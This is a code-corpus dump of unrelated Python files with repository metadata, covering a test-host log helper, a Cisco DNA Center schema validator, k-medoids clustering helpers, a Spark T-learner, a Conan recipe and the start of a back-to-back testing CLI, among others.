def add_log(self, log_file):
self.logs.append(log_file)
def get_logs(self, local_log_dir=None):
for log in self.logs:
if local_log_dir:
self.local_execute(["scp", self.user + "@[" + self.host + "]:" + log, local_log_dir])
self.execute(["rm", log])
del self.logs[:]
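A minimal sketch of driving the Host class above; with host=None commands run locally, otherwise they are wrapped in ssh (the remote address is hypothetical):

local = Host(name="local")                       # host=None -> run via subprocess
status, output = local.execute(["uname", "-a"])
print(status, output)

remote = Host(host="192.168.1.10", name="dut")   # hypothetical DUT address
status, output = remote.execute(["ifconfig", "wlan0"])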
avg_line_length: 30.66055 | max_line_length: 101 | alphanum_fraction: 0.573908

hexsha: 64d7d2814330d812da07985daacc86cce42cd7f3 | size: 3,414 | ext: py | lang: Python
repo: oboehmer/dnacentersdk @ 25c4e99900640deee91a56aa886874d9cb0ca960 | path: tests/models/validators/v2_2_2_3/jsd_df9908ad265e83ab77d73803925678.py | licenses: ["MIT"]
stars: 32 (2019-09-05T05:16:56.000Z to 2022-03-22T09:50:38.000Z) | issues: 35 (2019-09-07T18:58:54.000Z to 2022-03-24T19:29:36.000Z) | forks: 18 (2019-09-09T11:07:21.000Z to 2022-03-25T08:49:59.000Z)
# -*- coding: utf-8 -*-
"""Cisco DNA Center UpdateSite data model.
Copyright (c) 2019-2021 Cisco Systems.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import fastjsonschema
import json
from dnacentersdk.exceptions import MalformedRequest
from builtins import *
class JSONSchemaValidatorDf9908Ad265E83Ab77D73803925678(object):
"""UpdateSite request schema definition."""
def __init__(self):
super(JSONSchemaValidatorDf9908Ad265E83Ab77D73803925678, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"response": {
"properties": {
"data": {
"type": "string"
},
"endTime": {
"type": "string"
},
"id": {
"type": "string"
},
"instanceTenantId": {
"type": "string"
},
"isError": {
"type": "string"
},
"operationIdList": {
"items": {
"type": "string"
},
"type": "array"
},
"progress": {
"type": "string"
},
"rootId": {
"type": "string"
},
"serviceType": {
"type": "string"
},
"startTime": {
"type": "string"
},
"version": {
"type": "string"
}
},
"type": "object"
},
"result": {
"type": "string"
},
"status": {
"type": "string"
}
},
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
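A small sketch of exercising a validator like the one above; the request payload is a hypothetical minimal example:

validator = JSONSchemaValidatorDf9908Ad265E83Ab77D73803925678()
request = {
    "response": {"id": "abc123", "isError": "false", "progress": "site updated"},
    "status": "ok",
}
validator.validate(request)  # raises MalformedRequest if the payload does not match the schema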
avg_line_length: 31.906542 | max_line_length: 81 | alphanum_fraction: 0.522261

hexsha: c4502f105f976baa26c345fa774e8ad477a0411e | size: 1,521 | ext: py | lang: Python
repo: csy1204/recsys_2019_conf_ver @ c072407f46dbff73a0e0c916dd4379e6a9e6594b | path: src/recsys/data_prep/calculate_loo_stats.py | licenses: ["Apache-2.0"]
stars: null | issues: 6 (2020-09-26T01:19:12.000Z to 2021-08-25T16:09:24.000Z) | forks: null
from collections import defaultdict
from csv import DictWriter
import pandas as pd
import sys
sys.path.append('/Users/josang-yeon/2020/tobigs/tobigs_reco_conf/recsys2019/src')
from recsys.data_generator.accumulators import ACTIONS_WITH_ITEM_REFERENCE
from tqdm import tqdm
import numpy as np
import joblib
"""
Calculates leave one out stats
"""
data = pd.read_csv("../../../data/events_sorted.csv")
stats = {}
"""
Build stats
item_id -> stat_name -> set(users)
"""
for action_type, user_id, impression, reference in tqdm(
zip(data["action_type"], data["user_id"], data["impressions"], data["reference"])
):
    if reference is None or pd.isna(reference) or action_type != "clickout item":
continue
for item_id in impression.split("|"):
item_id = int(item_id)
try:
stats[item_id]["impressions"].add(user_id)
except KeyError:
stats[item_id] = {"impressions": {user_id}}
for user_id, reference, action_type in tqdm(zip(data["user_id"], data["reference"], data["action_type"])):
    if reference is None or pd.isna(reference):
continue
if action_type in ACTIONS_WITH_ITEM_REFERENCE:
try:
item_id = int(reference)
except:
continue
if item_id not in stats:
stats[item_id] = {}
try:
stats[item_id][action_type].add(user_id)
except KeyError:
stats[item_id][action_type] = {user_id}
joblib.dump(stats, "../../../data/item_stats_loo.joblib")
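A short sketch of reading the dumped stats back and turning the per-item user sets into plain counts:

stats = joblib.load("../../../data/item_stats_loo.joblib")
item_id = next(iter(stats))                                   # any item, for illustration
counts = {name: len(users) for name, users in stats[item_id].items()}
print(item_id, counts)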
avg_line_length: 27.654545 | max_line_length: 106 | alphanum_fraction: 0.657462

hexsha: 538577eb13e75bb83ca54074247ccb987e112ed7 | size: 9,791 | ext: py | lang: Python
repo: msilvestro/dupin @ db06432cab6910c6965b9c35baaef96eb84f0d81 | path: clustering/kmedoids_helper.py | licenses: ["MIT"]
stars: null | issues: null | forks: null
"""Helper functions for k-medoids algorithms."""
import numpy as np
from numba import jit
def _get_clusters(metric=None, method='memory'):
# if a method requires it, check if a metric is given
if method in ('hybrid', 'cpu') and not metric:
        print("Error: with method `{:}` a metric is necessary.".format(method))
return
if method == 'memory':
return get_clusters_memory
if method == 'hybrid':
return lambda data, medoids: get_clusters_hybrid(data, medoids, metric)
if method == 'cpu':
return _get_clusters_cpu(metric)
print("Error: method `{:}` unknown.".format(method))
return
def _get_medoid(metric=None, method='memory'):
# if a method requires it, check if a metric is given
if method in ('hybrid', 'cpu') and not metric:
        print("Error: with method `{:}` a metric is necessary.".format(method))
return
if method == 'memory':
return get_medoid_memory
if method == 'hybrid':
return _get_medoid_hybrid(metric)
if method == 'cpu':
return _get_medoid_cpu(metric)
print("Error: method `{:}` unknown.".format(method))
return
@jit
def get_clusters_memory(diss, medoids):
r"""Compute the clusters induced by the medoids on the dissimilarity matrix.
Parameters
----------
diss : (n, n) ndarray
Squared symmetric dissimilarity matrix.
medoids : (n,) ndarray
Set of medoids, given as index of data objects representing them.
Returns
-------
clusterid : ndarray
An array containing the number of the cluster to which each object was
assigned, where the cluster number is defined as the object number of
the objects representing the cluster centroid.
error : float
The within-cluster sum of distances of the clustering solution.
Notes
-----
Very fast implementation. Requires enough memory to store a n\*n matrix
(that is the dissimilarity matrix, n is the number of data objects).
"""
# take the submatrix in which columns corresponds to the medoids, then take
# the argmin row-wise
clustermem = diss[:, medoids].argmin(axis=1)
# we want a vector with medoid indices with respect to the data and not
# positional indices, i.e. we do not want [0, 1, 2] but
# [med_1, med_2, med_3]
clusterid = np.empty(clustermem.shape[0], dtype=np.uint32)
for i, medoid in enumerate(medoids):
clusterid[clustermem == i] = medoid
# compute also the error
error = diss[:, medoids].min(axis=1).sum()
return clusterid, error
@jit
def get_medoid_memory(diss, cluster):
r"""Compute the medoid of a cluster.
Parameters
----------
diss : (n, n) ndarray
Squared symmetric dissimilarity matrix.
cluster : (n,) ndarray
Set of the indices of all objects belonging to the cluster.
Returns
-------
medoid : int
Index of the object chosen as medoid of the cluster, i.e. it is the
object that minimizes the sum of distances with respect to all the
other cluster members.
Notes
-----
Very fast implementation. Requires enough memory to store a n\*n matrix
(that is the dissimilarity matrix, n is the number of data objects).
"""
medoid = cluster[np.sum(
diss[np.ix_(cluster, cluster)], axis=1
).argmin()]
return medoid
@jit
def get_clusters_hybrid(data, medoids, metric):
r"""Compute the clusters induced by the medoids on data.
Parameters
----------
data : (n,) ndarray
Data set.
medoids : (n,) ndarray
Set of medoids, given as index of data objects representing them.
metric : function
Function to compute pairwise distances.
Returns
-------
clusterid : (n,) ndarray
An array containing the number of the cluster to which each object was
assigned, where the cluster number is defined as the object number of
the objects representing the cluster centroid.
error : float
The within-cluster sum of distances of the clustering solution.
Notes
-----
Quite fast implementation. Requires enough memory to store a n\*k matrix
(n is the number of data objects and k is the number of clusters).
"""
# make a big matrix that in the i-th row has the distances between the i-th
# object and the medoids
dists = np.zeros((data.shape[0], medoids.shape[0]))
for i, obj in enumerate(data):
for j, med in enumerate(medoids):
if i != med:
dists[i, j] = metric(obj, data[med])
# take the index corresponding to the medoid with minimum distance from the
# object
clustermem = dists.argmin(axis=1)
# we want a vector with medoid indices with respect to the data and not
# positional indices, i.e. we do not want [0, 1, 2] but
# [med_1, med_2, med_3]
clusterid = np.empty(clustermem.shape[0], dtype=np.uint32)
for i, medoid in enumerate(medoids):
clusterid[clustermem == i] = medoid
# take the minimum row-wise and sum the resulting vector to get the error
error = dists.min(axis=1).sum()
return clusterid, error
def _get_medoid_hybrid(metric):
@jit(nopython=True)
def get_medoid_hybrid(data, cluster):
r"""Compute the medoid of a cluster.
Parameters
----------
data : (n,) ndarray
Data set.
cluster : (n,) ndarray
Set of the indices of all objects belonging to the cluster.
metric : function
Function to compute pairwise distances.
Returns
-------
medoid : int
Index of the object chosen as medoid of the cluster, i.e. it is the
object that minimizes the sum of distances with respect to all the
other cluster members.
Notes
-----
Quite fast implementation. Requires enough memory to store a m\*m
matrix (m is the size of the given cluster).
"""
# make a dissimilarity matrix of the cluster passed in
m = cluster.shape[0]
diss = np.zeros((m, m))
for i in range(m):
for j in range(i+1):
dist = metric(data[cluster[i]], data[cluster[j]])
diss[i, j] = dist
diss[j, i] = dist
# then take the sum by row and choose the cluster member that minimizes
# it
medoid = cluster[diss.sum(axis=1).argmin()]
return medoid
return get_medoid_hybrid
def _get_clusters_cpu(metric):
@jit(nopython=True)
def get_clusters_cpu(data, medoids):
"""Compute the clusters induced by the medoids on data.
Parameters
----------
data : (n,) ndarray
Data set.
medoids : (n,) ndarray
Set of medoids, given as index of data objects representing them.
metric : function
Function to compute pairwise distances.
Returns
-------
clusterid : (n,) ndarray
An array containing the number of the cluster to which each object
was assigned, where the cluster number is defined as the object
number of the objects representing the cluster centroid.
error : float
The within-cluster sum of distances of the clustering solution.
Notes
-----
Slowest implementation. Does not require to store matrices in memory.
Version to let `numba` run in `nopython` mode (faster).
"""
n = data.shape[0]
k = medoids.shape[0]
clusterid = np.empty(n, dtype=np.uint32)
error = 0
for i in range(n):
# select the cluster whom medoid is closest to the current object
min_dist = np.inf
min_j = -1
for j in range(k):
if i == medoids[j]:
# if the object is a medoid, its cluster will not change
# hence end the loop
min_dist = 0
min_j = j
break
else:
dist = metric(data[i], data[medoids[j]])
if dist < min_dist:
min_dist = dist
min_j = j
clusterid[i] = medoids[min_j]
error += min_dist
return clusterid, error
return get_clusters_cpu
def _get_medoid_cpu(metric):
@jit(nopython=True)
def get_medoid_cpu(data, cluster):
"""Compute the medoid of a cluster.
Parameters
----------
data : (n,) ndarray
Data set.
cluster : (n,) ndarray
Set of the indices of all objects belonging to the cluster.
metric : function
Function to compute pairwise distances.
Returns
-------
medoid : int
Index of the object chosen as medoid of the cluster, i.e. it is the
object that minimizes the sum of distances with respect to all the
other cluster members.
Notes
-----
Slowest implementation. Does not require to store matrices in memory.
Version to let `numba` run in `nopython` mode (faster).
"""
min_dist = np.inf
medoid = -1
for prop in cluster:
# for each proposed medoid, compute the sum of distances between it
# and each other cluster member
dist = 0
for j in cluster:
if prop != j:
dist += metric(data[prop], data[j])
# retain it only if it has a lower sum of distances
if dist < min_dist:
min_dist = dist
medoid = prop
return medoid
return get_medoid_cpu
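A small sketch exercising the memory-based helpers above on a toy dissimilarity matrix:

toy_diss = np.array([[0., 1., 5., 6.],
                     [1., 0., 4., 5.],
                     [5., 4., 0., 1.],
                     [6., 5., 1., 0.]])
medoids = np.array([0, 2])
clusterid, error = get_clusters_memory(toy_diss, medoids)
print(clusterid)  # [0 0 2 2]: objects 0,1 join medoid 0, objects 2,3 join medoid 2
print(error)      # 2.0, the within-cluster sum of distances
print(get_medoid_memory(toy_diss, np.array([0, 1])))  # 0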
avg_line_length: 32.528239 | max_line_length: 80 | alphanum_fraction: 0.597283

hexsha: 4cc6782e39a34694a60836248f132bc1ed7eb44b | size: 884 | ext: py | lang: Python
repo: devetek/Omni @ 3a0676f307bd1814da925e1a184743c517ec9307 | path: libraries/parser/yaml.py | licenses: ["Apache-2.0"]
stars: 4 (2019-04-30T11:07:11.000Z to 2019-06-10T03:03:37.000Z) | issues: 8 (2019-07-17T17:13:09.000Z to 2022-02-26T15:40:01.000Z) | forks: null
import yaml
import os.path
class Ryaml:
PATH = ''
IS_PATH = True
def __init__(self):
pass
def set_path(self, path):
isFile = os.path.isfile(path)
self.IS_PATH = isFile
if self.__is_path():
self.PATH = path
else:
self.PATH = ""
def get_path(self):
return self.PATH
def __is_path(self):
return self.IS_PATH
def __open_file(self):
try:
with open(self.PATH, 'r') as yamlFile:
                data = yaml.safe_load(yamlFile)
return data
except:
return {}
def read(self):
return self.__open_file()
if __name__ == '__main__':
pass
# PATH_TEST = "./../roles/node/main.yaml"
# yamlReader = Ryaml()
# yamlReader.set_path(PATH_TEST)
# dictPATH = yamlReader.read()
avg_line_length: 18.040816 | max_line_length: 50 | alphanum_fraction: 0.548643

hexsha: eb6df7f19c6af69a774f0bc00beef20f4264b368 | size: 784 | ext: py | lang: Python
repo: vineethreddyramasa/uno-community-partnership @ 694886b7ad7fa98f6dbb24b03476962cfadebc70 | path: projects/migrations/0005_auto_20190407_1457.py | licenses: ["MIT"]
stars: 13 (2018-08-30T16:03:18.000Z to 2019-11-25T07:08:43.000Z) | issues: 814 (2018-08-30T02:28:55.000Z to 2022-03-11T23:31:45.000Z) | forks: 6 (2018-09-16T05:35:49.000Z to 2019-10-17T02:44:19.000Z)
# Generated by Django 2.1.1 on 2019-04-07 19:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('projects', '0004_auto_20190407_1443'),
]
operations = [
migrations.AlterField(
model_name='project',
name='academic_year',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='academic_year1', to='projects.AcademicYear'),
),
migrations.AlterField(
model_name='project',
name='end_academic_year',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='academic_year2', to='projects.AcademicYear'),
),
]
avg_line_length: 31.36 | max_line_length: 151 | alphanum_fraction: 0.658163

hexsha: 3108e5c2b20036e6d0245f4c28e5eedda948e66a | size: 398 | ext: py | lang: Python
repo: swy20190/NiuKe @ d9dbbbbac403f5b4fe37efe82f9708aff614f018 | path: NC 5/code.py | licenses: ["MIT"]
stars: null | issues: null | forks: null
n = int(input())
string = input()
dp = []
for i in range(26):
dp.append([0]*n)
for i in range(n-1):
for j in range(26):
dp[j][n-2-i] = dp[j][n-1-i]
dp[ord(string[n-1-i])-ord('a')][n-2-i] += 1
answer = 0
for i in range(n-2):
for j in range(26):
if ord(string[i])-ord('a') != j:
times = dp[j][i]
answer += times*(times-1)/2
print(int(answer))
avg_line_length: 22.111111 | max_line_length: 47 | alphanum_fraction: 0.492462

hexsha: b4c52dbaa8cb9f3e72e956ffb21e165f9fea83d1 | size: 2,629 | ext: py | lang: Python
repo: Tereius/conan-center-index @ 6b0523fa57d8e8e890b040e95576f0bc584eeba8 | path: recipes/gemmlowp/all/conanfile.py | licenses: ["MIT"]
stars: 562 (2019-09-04T12:23:43.000Z to 2022-03-29T16:41:43.000Z) | issues: 9,799 (2019-09-04T12:02:11.000Z to 2022-03-31T23:55:45.000Z) | forks: 1,126 (2019-09-04T11:57:46.000Z to 2022-03-31T16:43:38.000Z)
import os
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
required_conan_version = ">=1.37.0"
class GemmlowpConan(ConanFile):
name = "gemmlowp"
license = "Apache-2.0"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/google/gemmlowp"
description = "Low-precision matrix multiplication"
topics = ("gemm", "matrix")
settings = "os", "arch", "compiler", "build_type"
options = {"shared": [True, False],
"fPIC": [True, False]}
default_options = {"shared": False,
"fPIC": True}
exports_sources = ["CMakeLists.txt"]
generators = "cmake", "cmake_find_package", "cmake_find_package_multi"
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def source(self):
tools.get(**self.conan_data["sources"][self.version], strip_root=True, destination=self._source_subfolder)
def validate(self):
if self.settings.os == "Windows" and self.options.shared:
raise ConanInvalidConfiguration("shared is not supported on Windows")
def configure(self):
if self.options.shared:
del self.options.fPIC
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.definitions['BUILD_TESTING'] = False
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
tools.rmdir(os.path.join(self.package_folder, "lib", "cmake"))
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
tools.rmdir(os.path.join(self.package_folder, "share"))
def package_info(self):
self.cpp_info.components["eight_bit_int_gemm"].names["cmake_find_package"] = "eight_bit_int_gemm"
self.cpp_info.components["eight_bit_int_gemm"].names["cmake_find_package_multi"] = "eight_bit_int_gemm"
self.cpp_info.components["eight_bit_int_gemm"].libs = ["eight_bit_int_gemm"]
if self.settings.os == "Linux":
self.cpp_info.components["eight_bit_int_gemm"].system_libs.extend(["pthread"])
avg_line_length: 36.013699 | max_line_length: 114 | alphanum_fraction: 0.659947

hexsha: 6ba7be2f303044a60bdd02da51266452eba1a045 | size: 1,164 | ext: py | lang: Python
repo: guochunhe/Vitis-AI @ e86b6efae11f8703ee647e4a99004dc980b84989 | path: models/AI-Model-Zoo/VAI-1.3-Model-Zoo-Code/PyTorch/pt_pointpillars_kitti_12000_100_10.8G_1.3/code/train/torchplus/ops/__init__.py | licenses: ["Apache-2.0"]
stars: 1 (2020-12-18T14:49:19.000Z to 2020-12-18T14:49:19.000Z) | issues: null | forks: null
# This code is based on: https://github.com/nutonomy/second.pytorch.git
#
# MIT License
# Copyright (c) 2018
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
avg_line_length: 52.909091 | max_line_length: 80 | alphanum_fraction: 0.777491

hexsha: 9ab6ca4e4dc1fe24b6a27e16f99f5f4e307b4acf | size: 5,372 | ext: py | lang: Python
repo: SoumilShekdar/Reina @ 638240a979a90a9b6ca9efb40edef6ecc71d836f | path: reina/MetaLearners/TLearner.py | licenses: ["MIT"]
stars: null | issues: null | forks: null
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
"""
Provides a spark-based T-learner heterogeneous treatment effect estimator.
"""
import pyspark
from pyspark.sql.functions import monotonically_increasing_id
from pyspark.ml.feature import VectorAssembler
from pyspark.sql.functions import avg
from pyspark.sql.functions import lit
from pyspark.sql.functions import col
from pyspark.sql.functions import when
from pyspark.sql import SparkSession
from pyspark.sql.functions import udf
from pyspark.sql.types import FloatType
class TLearner:
"""
Spark-based T-learner heterogeneous treatment effect estimator.
Assumptions
---------------
This class assumes that the data is already stored in a distributed storage system (e.g., HDFS).
This class also assumes that the treatment variable only contains 1s and 0s.
"""
def __init__(self, learner="T"):
self.treatments = [] # Multiple treatment effects can be estimated
self.outcome = None
self.covariates = []
self.estimator_0 = None
        self.estimator_1 = None
        self.cate = {}                       # per-treatment CATE dataframes, filled by effects()
        self.average_treatment_effects = {}  # per-treatment ATE values, filled by effects()
def fit(self, data, treatments, outcome, estimator_0, estimator_1):
"""
        Wrapper function to fit an ML-based counterfactual model.
        When multiple treatments are inputted, each treatment effect is estimated individually.
Parameters
----------
data (2-D Spark dataframe): Base dataset containing features, treatment, iv, and outcome variables
treatments (List): Names of the treatment variables
outcome (Str): Name of the outcome variable
estimator_0 (mllib model obj): Arbitrary ML model of choice
estimator_1 (mllib model obj): Arbitrary ML model of choice
Returns
------
self
"""
self.treatments = treatments
self.outcome = outcome
self.covariates = [var for var in data.columns if var not in treatments and var != outcome]
self.estimator_0 = estimator_0
self.estimator_1 = estimator_1
self.__fit(data)
def effects(self, X, treatment):
"""
Function to get the estimated heterogeneous treatment effect from the fitted counterfactual model.
The treatment effect is calculated by taking the difference between the predicted counterfactual outcomes.
Parameters
----------
X (2-D Spark dataframe): Feature data to estimate treatment effect of
treatment (Str): Name of the treatment variable
returns
-------
cate: conditional average treatment effect
ate: average treatment effect
"""
# Input treatment has to be fitted
assert treatment in self.treatments
        # Get predictions from the fitted treatment-group and control-group models
assembler = VectorAssembler(inputCols=self.covariates+[treatment], outputCol='features')
X_assembled = assembler.transform(X)
        prediction_1 = self.estimator_1.transform(X_assembled.select('features')).withColumnRenamed("prediction", "prediction_1").select("prediction_1")
        prediction_0 = self.estimator_0.transform(X_assembled.select('features')).withColumnRenamed("prediction", "prediction_0").select("prediction_0")
# Get Cate
X_w_pred = self.__mergeDfCol(X, prediction_1)
X_w_pred = self.__mergeDfCol(X_w_pred, prediction_0)
self.cate[treatment] = X_w_pred.select(X_w_pred.prediction_1 - X_w_pred.prediction_0).withColumnRenamed("(prediction_1 - prediction_0)", "cate")
self.average_treatment_effects[treatment] = float(self.cate[treatment].groupby().avg().head()[0])
        return self.cate[treatment], self.average_treatment_effects[treatment]
    def __fit(self, data):
for treatment in self.treatments:
# Set up assembler
assembler = VectorAssembler(inputCols=self.covariates+[treatment], outputCol='features')
# First estimator (treatment group)
treatment_group = data.filter(treatment+" == 1")
treatment_group_assembled = assembler.transform(treatment_group)
treatment_group_assembled = treatment_group_assembled.select(['features', self.outcome])
self.estimator_1 = self.estimator_1.fit(treatment_group_assembled)
# Second estimator (control group)
control_group = data.filter(treatment+" == 0")
control_group_assembled = assembler.transform(control_group)
control_group_assembled = control_group_assembled.select(['features', self.outcome])
self.estimator_0 = self.estimator_0.fit(control_group_assembled)
def __mergeDfCol(self, df_1, df_2):
"""
Function to merge two spark dataframes.
Parameters
----------
df_1 (2-D Spark dataframe): Spark dataframe to merge
df_2 (2-D Spark dataframe): Spark dataframe to merge
Returns
------
df_3 (2-D Spark dataframe): Spark dataframe merged by df1 and df2
"""
df_1 = df_1.withColumn("COL_MERGE_ID", monotonically_increasing_id())
df_2 = df_2.withColumn("COL_MERGE_ID", monotonically_increasing_id())
        df_3 = df_2.join(df_1, "COL_MERGE_ID").drop("COL_MERGE_ID")
return df_3
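# --- Usage sketch (illustrative, not part of the original module) ---
# The helper below shows one way this class might be driven with pyspark.ml
# regression estimators. The Spark session setup, the parquet path and the
# column names ("treated", "outcome") are hypothetical; only the fit()/effects()
# signatures defined above are taken from the class itself.
def _tlearner_usage_example():  # pragma: no cover - illustrative only
    from pyspark.sql import SparkSession
    from pyspark.ml.regression import LinearRegression

    spark = SparkSession.builder.appName("tlearner-example").getOrCreate()
    # Hypothetical dataset with covariate columns, a binary "treated" column and an "outcome" column
    data = spark.read.parquet("hdfs:///path/to/training_data")
    learner = TLearner()
    learner.fit(
        data,
        treatments=["treated"],
        outcome="outcome",
        estimator_0=LinearRegression(featuresCol="features", labelCol="outcome"),
        estimator_1=LinearRegression(featuresCol="features", labelCol="outcome"),
    )
    # effects() expects the covariates plus the treatment column
    cate, ate = learner.effects(data.drop("outcome"), "treated")
    return cate, ate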
| 40.089552
| 152
| 0.657111
|
e5a5bae27ddc1ba6b78eb733e75cae83cee92ddd
| 35,273
|
py
|
Python
|
src/b2bt/main.py
|
HubTou/b2bt
|
9e53a254226f7eaee32da332c3340b906c36c1eb
|
[
"BSD-3-Clause"
] | null | null | null |
src/b2bt/main.py
|
HubTou/b2bt
|
9e53a254226f7eaee32da332c3340b906c36c1eb
|
[
"BSD-3-Clause"
] | 1
|
2021-06-05T07:59:58.000Z
|
2021-06-05T08:19:57.000Z
|
src/b2bt/main.py
|
HubTou/b2bt
|
9e53a254226f7eaee32da332c3340b906c36c1eb
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
""" b2bt - back-to-back testing
License: 3-clause BSD (see https://opensource.org/licenses/BSD-3-Clause)
Author: Hubert Tournier
"""
import ctypes
import difflib
import getopt
import getpass
import hashlib
import locale
import logging
import os
import platform
import shutil
import subprocess
import sys
import time
# Mandatory dependency upon defusedxml
import defusedxml.minidom
# Optional dependency upon colorama
# Use "pip install colorama" to install
try:
    import colorama
    COLORAMA = True
except ModuleNotFoundError:
    COLORAMA = False
    # Minimal stand-in so the colorama.Fore / colorama.Style references below still
    # resolve when colorama is not installed; color_print() never emits them in that case.
    colorama = type("colorama", (), {
        "Fore": type("Fore", (), {"RED": "", "GREEN": "", "YELLOW": ""}),
        "Style": type("Style", (), {"BRIGHT": "", "RESET_ALL": ""})})
# Version string used by the what(1) and ident(1) commands:
ID = "@(#) $Id: b2bt - back-to-back testing v1.1.2 (September 26, 2021) by Hubert Tournier $"
__version__ = "1.1.2"
# Default parameters. Can be overcome by environment variables, then command line options
DEFAULT_TIMEOUT = 120.0
MINIMUM_DEFAULT_TIMEOUT = 30.0
parameters = {
"Original command path": "",
"New command path": "",
"Keep results": False,
"Overwrite results": False,
"Quiet differences": False,
"Skip original command": False,
"Auto confirm": False,
"No colors": False,
"Timeout": DEFAULT_TIMEOUT,
}
################################################################################
def initialize_debugging(program_name):
"""Debugging set up"""
console_log_format = program_name + ": %(levelname)s: %(message)s"
logging.basicConfig(format=console_log_format, level=logging.DEBUG)
logging.disable(logging.INFO)
################################################################################
def display_help():
"""Displays usage and help"""
print("usage: b2bt [--debug] [-f|--force] [--help|-?] [-k|--keep]", file=sys.stderr)
print(
" [-n|--newpath PATH] [-o|--origpath PATH] [-q|--quiet] [-s|--skip]",
file=sys.stderr,
)
print(
" [-t|--timeout VALUE] [--version] [-y|--autoconfirm] [-N|--nocolors]",
file=sys.stderr,
)
print(" [--] filename [...]", file=sys.stderr)
print(
" ------------------ --------------------------------------------------",
file=sys.stderr,
)
print(" -f|--force Overwrite results directories", file=sys.stderr)
print(
" -k|--keep Keep results directories after running", file=sys.stderr
)
print(" -n|--newpath PATH Path of the new command", file=sys.stderr)
print(
" -o|--origpath PATH Path of the original command if not in $PATH",
file=sys.stderr,
)
print(" -q|--quiet Don't detail run differences", file=sys.stderr)
print(" -s|--skip Skip original command processing", file=sys.stderr)
print(
" -t|--timeout VALUE Set default timeout (%0.1f s) to a new value"
% DEFAULT_TIMEOUT,
file=sys.stderr,
)
print(
" -y|--autoconfirm Don't ask for confirmation before test case execution",
file=sys.stderr,
)
print(" -N|--nocolors Don't use colors in output", file=sys.stderr)
print(" --debug Enable debug mode", file=sys.stderr)
print(
" --help|-? Print usage and this help message and exit",
file=sys.stderr,
)
print(" --version Print version and exit", file=sys.stderr)
print(" -- Options processing terminator", file=sys.stderr)
print(file=sys.stderr)
################################################################################
def process_environment_variables():
"""Process environment variables"""
# pylint: disable=C0103
global parameters
# pylint: enable=C0103
if "B2BT_OPTIONS" in os.environ.keys():
if "f" in os.environ["B2BT_OPTIONS"]:
parameters["Overwrite results"] = True
if "k" in os.environ["B2BT_OPTIONS"]:
parameters["Keep results"] = True
if "q" in os.environ["B2BT_OPTIONS"]:
parameters["Quiet differences"] = True
if "s" in os.environ["B2BT_OPTIONS"]:
parameters["Skip original command"] = True
if "y" in os.environ["B2BT_OPTIONS"]:
parameters["Auto confirm"] = True
if "N" in os.environ["B2BT_OPTIONS"]:
parameters["No colors"] = True
if "B2BT_DEBUG" in os.environ.keys():
logging.disable(logging.NOTSET)
logging.debug("process_environment_variables(): parameters:")
logging.debug(parameters)
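# Illustrative shell usage (not from the original file): the letters accepted in
# B2BT_OPTIONS mirror the single-letter command line flags handled above, e.g.
#   export B2BT_OPTIONS=kq   # keep result directories and don't detail differences
#   export B2BT_DEBUG=1      # any value enables debug logging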
################################################################################
def process_command_line():
"""Process command line options"""
# pylint: disable=C0103
global parameters
# pylint: enable=C0103
# option letters followed by : expect an argument
# same for option strings followed by =
character_options = "dfhkn:o:qst:vyN?"
string_options = [
"autoconfirm",
"debug",
"force",
"help",
"keep",
"newpath=",
"nocolors",
"origpath=",
"quiet",
"skip",
